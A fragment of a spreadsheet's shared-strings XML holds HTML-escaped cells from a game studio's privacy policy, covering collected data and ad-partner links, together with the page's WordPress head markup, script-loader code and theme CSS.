language;&lt;/span&gt;&lt;/li&gt;&lt;li</t>
  </si>
  <si>
    <t>class="c6"&gt;&lt;span class="c0"&gt;general location data;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;precise geo-location data (GPS, only for users above 13 (thirteen) years old for the United States and other countries, or 16 (sixteen) for the European Union, unless otherwise established by national law and with their direct consent);&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;data about your use of our application, such as gameplay data and interactions with other players (if applicable and only for users above 13 (thirteen) years old for the United States and other countries, or 16 (sixteen) for the European Union, unless otherwise established by national law).&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-1" start="6"&gt;&lt;li class="c3"&gt;&lt;span class="c4"&gt;When required by law, the Company reserves the right to disclose your Personal &lt;/span&gt;&lt;span class="c0"&gt;Information&lt;/span&gt;&lt;span class="c4"&gt;&amp;nbsp;to third parties or regulatory, law enforcement or other government authorities.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c4"&gt;We may also disclose your information to credit reporting or collection agencies, or when necessary to protect our rights or property. If at any time you choose to purchase a product or service offered by another company, for example by clicking on an advertisement on a website owned or controlled by the Company, any Personal &lt;/span&gt;&lt;span class="c0"&gt;Information&lt;/span&gt;&lt;span</t>
  </si>
  <si>
    <t>class="c4"&gt;&amp;nbsp;you share with that company will no longer be controlled under our Privacy Policy. &lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;Our software products include features from our partners, such as social media interaction tools and in-game advertising.</t>
  </si>
  <si>
    <t>A list of these partners is available below. These partners may access your data and operate under their own privacy policies. &lt;/span&gt;&lt;span class="c4"&gt;We are not responsible for the privacy policies or the content of sites we link to and we have no control over the use or protection of information provided by you to, or collected by, those websites.</t>
  </si>
  <si>
    <t>Whenever you click the link to a co-branded website or to a linked website, you may be asked to provide registration or other information. Please note that the information you are providing is going to a third party and you should familiarize yourself with the privacy policy published by that third party. &lt;/span&gt;&lt;span class="c0"&gt;We encourage you to check their privacy policies to learn more about their data processing practices:&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol</t>
  </si>
  <si>
    <t>class="c7 lst-kix_list_2-2 start" start="1"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Google AdMob &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://policies.google.com/technologies/ads&amp;amp;sa=D&amp;amp;ust=1607602738202000&amp;amp;usg=AOvVaw0M4CF1hcad6g1fWMCseSRB"&gt;https://policies.google.com/technologies/ads&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Unity and Unity Analytics &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://unity3d.com/ru/legal/gdpr&amp;amp;sa=D&amp;amp;ust=1607602738202000&amp;amp;usg=AOvVaw2A7vUPAC4PngSMyPI6lSvl"&gt;https://unity3d.com/ru/legal/gdpr&lt;/a&gt;&lt;/span&gt;&lt;span class="c0"&gt;&amp;nbsp;and &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://unity3d.com/ru/legal/privacy-policy&amp;amp;sa=D&amp;amp;ust=1607602738202000&amp;amp;usg=AOvVaw3JHjiz7nyHkFYFKbZIDpUl"&gt;https://unity3d.com/ru/legal/privacy-policy&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Unity Ads &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://unity3d.com/legal/privacy-policy&amp;amp;sa=D&amp;amp;ust=1607602738203000&amp;amp;usg=AOvVaw2C1j6DGQRzpai8dgnZHShg"&gt;https://unity3d.com/legal/privacy-policy&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c25"&gt;Clever Ads Solutions&lt;/span&gt;&lt;span class="c0"&gt;&amp;nbsp; (ClearInvestHouseAds) &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://cleveradssolutions.com/privacy-policy&amp;amp;sa=D&amp;amp;ust=1607602738203000&amp;amp;usg=AOvVaw2tX25FzYSzXXnbP_AdqatZ"&gt;https://cleveradssolutions.com/privacy-policy&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Firebase Analytics &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://firebase.google.com/support/privacy&amp;amp;sa=D&amp;amp;ust=1607602738204000&amp;amp;usg=AOvVaw0RRxRMXpPbJeM-ugcaqPFj"&gt;https://firebase.google.com/support/privacy&lt;/a&gt;&lt;/span&gt;&lt;span class="c0"&gt;&amp;nbsp;and &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://policies.google.com/privacy&amp;amp;sa=D&amp;amp;ust=1607602738204000&amp;amp;usg=AOvVaw3X697wMpv8qjFh9UsYYj_q"&gt;https://policies.google.com/privacy&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;AppLovin &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://www.applovin.com/privacy/&amp;amp;sa=D&amp;amp;ust=1607602738204000&amp;amp;usg=AOvVaw1EUPe05cyhhjSJiPCWQIIY"&gt;https://www.applovin.com/privacy/&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;ChartBoost &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://answers.chartboost.com/en-us/articles/200780269&amp;amp;sa=D&amp;amp;ust=1607602738205000&amp;amp;usg=AOvVaw2T21wsUmzy3xJHbp6yhwcb"&gt;https://answers.chartboost.com/en-us/articles/200780269&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Vungle &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://vungle.com/privacy/&amp;amp;sa=D&amp;amp;ust=1607602738205000&amp;amp;usg=AOvVaw2tXpQf1KnJX-hKWbyYg1xz"&gt;https://vungle.com/privacy/&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;StartApp &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://www.startapp.com/policy/privacy-policy/&amp;amp;sa=D&amp;amp;ust=1607602738205000&amp;amp;usg=AOvVaw3XqL_dfsrTafF-V7h2dlkn"&gt;https://www.startapp.com/policy/privacy-policy/&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Kidoz &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://kidoz.net/privacy-policy/&amp;amp;sa=D&amp;amp;ust=1607602738206000&amp;amp;usg=AOvVaw2HAGGaHqlg4GY-tEiMj0J2"&gt;https://kidoz.net/privacy-policy/&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;AppBrain &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://www.appbrain.com/info/help/privacy/index.html&amp;amp;sa=D&amp;amp;ust=1607602738206000&amp;amp;usg=AOvVaw32BEWcTXtz1d1fDjxpSIgd"&gt;https://www.appbrain.com/info/help/privacy/index.html&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;SuperAwesome &lt;/span&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
     &lt;link rel="preload" href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-css3d2ebff53d47fd84f7ac7c858aaa5f557be78b09ef8f8c441e7d983833b67.css" as="style" media="all" /&gt;
&lt;link rel="preload" href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-cssb60a21e671c48014df902e99820728a086545183d5f598df7bea6f2ebf3e3.css" as="style" media="all" /&gt;
&lt;link rel="preload" href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-css8f96c3ca37934886d8c847973b065028f6bbf39106a8e0a80c55e61ac2338.css" as="style" media="all" /&gt;
&lt;link rel="preload" href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-css5a0e998a5cb792ab725c3c7ee48ec0beefcb372e9b524155a17b470e95225.css" as="style" media="all" /&gt;
&lt;link rel="preload" href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-cssf004b53169eb40ea98d3c37ad919240c5e7bb196b16f2ea928d7b7bc1cac1.css" as="style" media="all" /&gt;
&lt;link rel="preload" href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-css7d1af7e1de403e44c303e4566fcdfe688326329a9edbe8a0832095786bc5d.css" as="style" media="all" /&gt;
&lt;link rel="preload" href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-cssbddf8221444f13324d7255c1d487706a36c0b85249c4047b705b022ae24fc.css" as="style" media="all" /&gt;
&lt;link rel="preload" href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-css286cb5d06a3c4c867f9d79aa12eca21b5b5d4acbd6e9110dd83075540ae5e.css" as="style" media="all" /&gt;&lt;script data-cfasync="false"&gt;if(navigator.userAgent.match(/MSIE|Internet Explorer/i)||navigator.userAgent.match(/Trident\/7\..*?rv:11/i)){var href=document.location.href;if(!href.match(/[?&amp;]iebrowser/)){if(href.indexOf("?")==-1){if(href.indexOf("#")==-1){document.location.href=href+"?iebrowser=1"}else{document.location.href=href.replace("#","?iebrowser=1#")}}else{if(href.indexOf("#")==-1){document.location.href=href+"&amp;iebrowser=1"}else{document.location.href=href.replace("#","&amp;iebrowser=1#")}}}}&lt;/script&gt;_x005F_x000D_
&lt;script data-cfasync="false"&gt;class FVMLoader{constructor(e){this.triggerEvents=e,this.eventOptions={passive:!0},this.userEventListener=this.triggerListener.bind(this),this.delayedScripts={normal:[],async:[],defer:[]},this.allJQueries=[]}_addUserInteractionListener(e){this.triggerEvents.forEach(t=&gt;window.addEventListener(t,e.userEventListener,e.eventOptions))}_removeUserInteractionListener(e){this.triggerEvents.forEach(t=&gt;window.removeEventListener(t,e.userEventListener,e.eventOptions))}triggerListener(){this._removeUserInteractionListener(this),"loading"===document.readyState?document.addEventListener("DOMContentLoaded",this._loadEverythingNow.bind(this)):this._loadEverythingNow()}async _loadEverythingNow(){this._runAllDelayedCSS(),this._delayEventListeners(),this._delayJQueryReady(this),this._handleDocumentWrite(),this._registerAllDelayedScripts(),await this._loadScriptsFromList(this.delayedScripts.normal),await this._loadScriptsFromList(this.delayedScripts.defer),await this._loadScriptsFromList(this.delayedScripts.async),await this._triggerDOMContentLoaded(),await this._triggerWindowLoad(),window.dispatchEvent(new Event("wpr-allScriptsLoaded"))}_registerAllDelayedScripts(){document.querySelectorAll("script[type=fvmdelay]").forEach(e=&gt;{e.hasAttribute("src")?e.hasAttribute("async")&amp;&amp;!1!==e.async?this.delayedScripts.async.push(e):e.hasAttribute("defer")&amp;&amp;!1!==e.defer||"module"===e.getAttribute("data-type")?this.delayedScripts.defer.push(e):this.delayedScripts.normal.push(e):this.delayedScripts.normal.push(e)})}_runAllDelayedCSS(){document.querySelectorAll("link[rel=fvmdelay]").forEach(e=&gt;{e.setAttribute("rel","stylesheet")})}async _transformScript(e){return await this._requestAnimFrame(),new Promise(t=&gt;{const n=document.createElement("script");let r;[...e.attributes].forEach(e=&gt;{let t=e.nodeName;"type"!==t&amp;&amp;("data-type"===t&amp;&amp;(t="type",r=e.nodeValue),n.setAttribute(t,e.nodeValue))}),e.hasAttribute("src")?(n.addEventListener("load",t),n.addEventListener("error",t)):(n.text=e.text,t()),e.parentNode.replaceChild(n,e)})}async _loadScriptsFromList(e){const t=e.shift();return t?(await this._transformScript(t),this._loadScriptsFromList(e)):Promise.resolve()}_delayEventListeners(){let e={};function t(t,n){!function(t){function n(n){return e[t].eventsToRewrite.indexOf(n)&gt;=0?"wpr-"+n:n}e[t]||(e[t]={originalFunctions:{add:t.addEventListener,remove:t.removeEventListener},eventsToRewrite:[]},t.addEventListener=function(){arguments[0]=n(arguments[0]),e[t].originalFunctions.add.apply(t,arguments)},t.removeEventListener=function(){arguments[0]=n(arguments[0]),e[t].originalFunctions.remove.apply(t,arguments)})}(t),e[t].eventsToRewrite.push(n)}function n(e,t){let n=e[t];Object.defineProperty(e,t,{get:()=&gt;n||function(){},set(r){e["wpr"+t]=n=r}})}t(document,"DOMContentLoaded"),t(window,"DOMContentLoaded"),t(window,"load"),t(window,"pageshow"),t(document,"readystatechange"),n(document,"onreadystatechange"),n(window,"onload"),n(window,"onpageshow")}_delayJQueryReady(e){let t=window.jQuery;Object.defineProperty(window,"jQuery",{get:()=&gt;t,set(n){if(n&amp;&amp;n.fn&amp;&amp;!e.allJQueries.includes(n)){n.fn.ready=n.fn.init.prototype.ready=function(t){e.domReadyFired?t.bind(document)(n):document.addEventListener("DOMContentLoaded2",()=&gt;t.bind(document)(n))};const t=n.fn.on;n.fn.on=n.fn.init.prototype.on=function(){if(this[0]===window){function e(e){return e.split(" ").map(e=&gt;"load"===e||0===e.indexOf("load. ")?"wpr-jquery-load":e).join(" ")}"string"==typeof arguments[0]||arguments[0]instanceof String?arguments[0]=e(arguments[0]):"object"==typeof arguments[0]&amp;&amp;Object.keys(arguments[0]).forEach(t=&gt;{delete Object.assign(arguments[0],{[e(t)]:arguments[0][t]})[t]})}return t.apply(this,arguments),this},e.allJQueries.push(n)}t=n}})}async _triggerDOMContentLoaded(){this.domReadyFired=!0,await</t>
  </si>
  <si>
    <t>this._requestAnimFrame(),document.dispatchEvent(new Event("DOMContentLoaded2")),await this._requestAnimFrame(),window.dispatchEvent(new Event("DOMContentLoaded2")),await this._requestAnimFrame(),document.dispatchEvent(new Event("wpr-readystatechange")),await this._requestAnimFrame(),document.wpronreadystatechange&amp;&amp;document.wpronreadystatechange()}async _triggerWindowLoad(){await this._requestAnimFrame(),window.dispatchEvent(new Event("wpr-load")),await this._requestAnimFrame(),window.wpronload&amp;&amp;window.wpronload(),await this._requestAnimFrame(),this.allJQueries.forEach(e=&gt;e(window).trigger("wpr-jquery-load")),window.dispatchEvent(new Event("wpr-pageshow")),await this._requestAnimFrame(),window.wpronpageshow&amp;&amp;window.wpronpageshow()}_handleDocumentWrite(){const e=new Map;document.write=document.writeln=function(t){const n=document.currentScript,r=document.createRange(),i=n.parentElement;let a=e.get(n);void 0===a&amp;&amp;(a=n.nextSibling,e.set(n,a));const s=document.createDocumentFragment();r.setStart(s,0),s.appendChild(r.createContextualFragment(t)),i.insertBefore(s,a)}}async _requestAnimFrame(){return new Promise(e=&gt;requestAnimationFrame(e))}static run(){const e=new FVMLoader(["keydown","mousemove","touchmove","touchstart","touchend","wheel"]);e._addUserInteractionListener(e)}}FVMLoader.run();&lt;/script&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no" name="viewport" /&gt;&lt;title&gt;Welcome to MythicOwl&lt;/title&gt;&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;&lt;link rel="alternate" hreflang="en-us" href="https://www.mythicowl.com/privacy-policy/" /&gt;&lt;link rel="alternate" hreflang="pl-pl" href="https://www.mythicowl.com/pl/polityka-prywatnosci/" /&gt;&lt;link rel="alternate" hreflang="x-default" href="https://www.mythicowl.com/privacy-policy/" /&gt;&lt;link rel="canonical" href="https://www.mythicowl.com/privacy-policy/" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:locale" content="en_US" /&gt;&lt;meta property="og:type" content="article" /&gt;&lt;meta property="og:title" content="Privacy Policy - MythicOwl" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:description" content="Overview This Privacy Policy describes the information collected by MythicOwl Sp. z o.o. (&amp;#8216;MythicOwl&amp;#8217;, &amp;#8216;we&amp;#8217;, &amp;#8216;us&amp;#8217; or &amp;#8216;our&amp;#8217;) through our mobile applications and websites (&amp;#8216;applications&amp;#8217;) and how we use that information. Information that we collect We collect limited information from our applications and the information that we get from other services such as Google Analytics, [&amp;hellip;]" /&gt;&lt;meta property="og:url" content="https://www.mythicowl.com/privacy-policy/" /&gt;&lt;meta property="og:site_name" content="MythicOwl" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="article:publisher" content="https://www.facebook.com/SteamBytes/" /&gt;&lt;meta property="article:modified_time" content="2020-02-28T15:11:26+00:00" /&gt;&lt;meta name="twitter:card" content="summary_large_image" /&gt;&lt;meta name="twitter:site" content="@steambytes" /&gt;&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://www.mythicowl.com/privacy-policy/","url":"https://www.mythicowl.com/privacy-policy/","name":"Privacy Policy - MythicOwl","isPartOf":{"@id":"https://www.mythicowl.com/#website"},"datePublished":"2016-10-27T08:50:10+00:00","dateModified":"2020-02-28T15:11:26+00:00","breadcrumb":{"@id":"https://www.mythicowl.com/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.mythicowl.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://www.mythicowl.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Strona główna","item":"https://www.mythicowl.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://www.mythicowl.com/#website","url":"https://www.mythicowl.com/","name":"MythicOwl","description":"Games that are time well spent","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.mythicowl.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}&lt;/script&gt;
    &lt;link rel="shortcut icon" type="image/png" href="https://www.mythicowl.com/wp-content/themes/website/favicon.png" /&gt;
&lt;script type="text/javascript" src="https://www.mythicowl.com/wp-includes/js/jquery/jquery.js?ver=1.12.4"&gt;&lt;/script&gt;
&lt;link rel='stylesheet' id='layerslider-css' href='https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-css3d2ebff53d47fd84f7ac7c858aaa5f557be78b09ef8f8c441e7d983833b67.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css' href='https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-cssb60a21e671c48014df902e99820728a086545183d5f598df7bea6f2ebf3e3.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-css8f96c3ca37934886d8c847973b065028f6bbf39106a8e0a80c55e61ac2338.css' type='text/css' media='all' /&gt;
&lt;style id='global-styles-inline-css' type='text/css' media="all"&gt;body{--wp--preset--color--black:#000;--wp--preset--color--cyan-bluish-gray:#abb8c3;--wp--preset--color--white:#fff;--wp--preset--color--pale-pink:#f78da7;--wp--preset--color--vivid-red:#cf2e2e;--wp--preset--color--luminous-vivid-orange:#ff6900;--wp--preset--color--luminous-vivid-amber:#fcb900;--wp--preset--color--light-green-cyan:#7bdcb5;--wp--preset--color--vivid-green-cyan:#00d084;--wp--preset--color--pale-cyan-blue:#8ed1fc;--wp--preset--color--vivid-cyan-blue:#0693e3;--wp--preset--color--vivid-purple:#9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple:linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan:linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange:linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red:linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray:linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum:linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76)</t>
  </si>
  <si>
    <t>100%);--wp--preset--gradient--blush-light-purple:linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux:linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk:linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean:linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass:linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight:linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale:url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale:url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow:url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red:url('#wp-duotone-blue-red');--wp--preset--duotone--midnight:url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow:url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green:url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange:url('#wp-duotone-blue-orange');--wp--preset--font-size--small:13px;--wp--preset--font-size--medium:20px;--wp--preset--font-size--large:36px;--wp--preset--font-size--x-large:42px;--wp--preset--spacing--20:0.44rem;--wp--preset--spacing--30:0.67rem;--wp--preset--spacing--40:1rem;--wp--preset--spacing--50:1.5rem;--wp--preset--spacing--60:2.25rem;--wp--preset--spacing--70:3.38rem;--wp--preset--spacing--80:5.06rem}:where(.is-layout-flex){gap:0.5em}body .is-layout-flow&gt;.alignleft{float:left;margin-inline-start:0;margin-inline-end:2em}body .is-layout-flow&gt;.alignright{float:right;margin-inline-start:2em;margin-inline-end:0}body .is-layout-flow&gt;.aligncenter{margin-left:auto!important;margin-right:auto!important}body .is-layout-constrained&gt;.alignleft{float:left;margin-inline-start:0;margin-inline-end:2em}body .is-layout-constrained&gt;.alignright{float:right;margin-inline-start:2em;margin-inline-end:0}body .is-layout-constrained&gt;.aligncenter{margin-left:auto!important;margin-right:auto!important}body .is-layout-constrained&gt;:where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width:var(--wp--style--global--content-size);margin-left:auto!important;margin-right:auto!important}body .is-layout-constrained&gt;.alignwide{max-width:var(--wp--style--global--wide-size)}body .is-layout-flex{display:flex}body .is-layout-flex{flex-wrap:wrap;align-items:center}body .is-layout-flex&gt;*{margin:0}:where(.wp-block-columns.is-layout-flex){gap:2em}.has-black-color{color:var(--wp--preset--color--black)!important}.has-cyan-bluish-gray-color{color:var(--wp--preset--color--cyan-bluish-gray)!important}.has-white-color{color:var(--wp--preset--color--white)!important}.has-pale-pink-color{color:var(--wp--preset--color--pale-pink)!important}.has-vivid-red-color{color:var(--wp--preset--color--vivid-red)!important}.has-luminous-vivid-orange-color{color:var(--wp--preset--color--luminous-vivid-orange)!important}.has-luminous-vivid-amber-color{color:var(--wp--preset--color--luminous-vivid-amber)!important}.has-light-green-cyan-color{color:var(--wp--preset--color--light-green-cyan)!important}.has-vivid-green-cyan-color{color:var(--wp--preset--color--vivid-green-cyan)!important}.has-pale-cyan-blue-color{color:var(--wp--preset--color--pale-cyan-blue)!important}.has-vivid-cyan-blue-color{color:var(--wp--preset--color--vivid-cyan-blue)!important}.has-vivid-purple-color{color:var(--wp--preset--color--vivid-purple)!important}.has-black-background-color{background-color:var(--wp--preset--color--black)!important}.has-cyan-bluish-gray-background-color{background-color:var(--wp--preset--color--cyan-bluish-gray)!important}.has-white-background-color{background-color:var(--wp--preset--color--white)!important}.has-pale-pink-background-color{background-color:var(--wp--preset--color--pale-pink)!important}.has-vivid-red-background-color{background-color:var(--wp--preset--color--vivid-red)!important}.has-luminous-vivid-orange-background-color{background-color:var(--wp--preset--color--luminous-vivid-orange)!important}.has-luminous-vivid-amber-background-color{background-color:var(--wp--preset--color--luminous-vivid-amber)!important}.has-light-green-cyan-background-color{background-color:var(--wp--preset--color--light-green-cyan)!important}.has-vivid-green-cyan-background-color{background-color:var(--wp--preset--color--vivid-green-cyan)!important}.has-pale-cyan-blue-background-color{background-color:var(--wp--preset--color--pale-cyan-blue)!important}.has-vivid-cyan-blue-background-color{background-color:var(--wp--preset--color--vivid-cyan-blue)!important}.has-vivid-purple-background-color{background-color:var(--wp--preset--color--vivid-purple)!important}.has-black-border-color{border-color:var(--wp--preset--color--black)!important}.has-cyan-bluish-gray-border-color{border-color:var(--wp--preset--color--cyan-bluish-gray)!important}.has-white-border-color{border-color:var(--wp--preset--color--white)!important}.has-pale-pink-border-color{border-color:var(--wp--preset--color--pale-pink)!important}.has-vivid-red-border-color{border-color:var(--wp--preset--color--vivid-red)!important}.has-luminous-vivid-orange-border-color{border-color:var(--wp--preset--color--luminous-vivid-orange)!important}.has-luminous-vivid-amber-border-color{border-color:var(--wp--preset--color--luminous-vivid-amber)!important}.has-light-green-cyan-border-color{border-color:var(--wp--preset--color--light-green-cyan)!important}.has-vivid-green-cyan-border-color{border-color:var(--wp--preset--color--vivid-green-cyan)!important}.has-pale-cyan-blue-border-color{border-color:var(--wp--preset--color--pale-cyan-blue)!important}.has-vivid-cyan-blue-border-color{border-color:var(--wp--preset--color--vivid-cyan-blue)!important}.has-vivid-purple-border-color{border-color:var(--wp--preset--color--vivid-purple)!important}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background:var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple)!important}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background:var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan)!important}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background:var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange)!important}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background:var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red)!important}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background:var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray)!important}.has-cool-to-warm-spectrum-gradient-background{background:var(--wp--preset--gradient--cool-to-warm-spectrum)!important}.has-blush-light-purple-gradient-background{background:var(--wp--preset--gradient--blush-light-purple)!important}.has-blush-bordeaux-gradient-background{background:var(--wp--preset--gradient--blush-bordeaux)!important}.has-luminous-dusk-gradient-background{background : var(--wp--preset--gradient--luminous-dusk)!important}.has-pale-ocean-gradient-background{background:var(--wp--preset--gradient--pale-ocean)!important}.has-electric-grass-gradient-background{background:var(--wp--preset--gradient--electric-grass)!important}.has-midnight-gradient-background{background:var(--wp--preset--gradient--midnight)!important}.has-small-font-size{font-size:var(--wp--preset--font-size--small)!important}.has-medium-font-size{font-size:var(--wp--preset--font-size--medium)!important}.has-large-font-size{font-size:var(--wp--preset--font-size--large)!important}.has-x-large-font-size{font-size:var(--wp--preset--font-size--x-large)!important}.wp-block-navigation a:where(:not(.wp-element-button)){color:inherit}:where(.wp-block-columns.is-layout-flex){gap:2em}.wp-block-pullquote{font-size:1.5em;line-height:1.6}&lt;/style&gt;
&lt;link rel='stylesheet' id='moove_gdpr_frontend-css' href='https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-css5a0e998a5cb792ab725c3c7ee48ec0beefcb372e9b524155a17b470e95225.css' type='text/css' media='all' /&gt;
&lt;style id='moove_gdpr_frontend-inline-css' type='text/css' media="all"&gt;#moove_gdpr_cookie_modal,#moove_gdpr_cookie_info_bar,.gdpr_cookie_settings_shortcode_content{font-family:Nunito,sans-serif}#moove_gdpr_save_popup_settings_button{background-color:#373737;color:#fff}#moove_gdpr_save_popup_settings_button:hover{background-color:#000}#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.mgbutton,#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content</t>
  </si>
  <si>
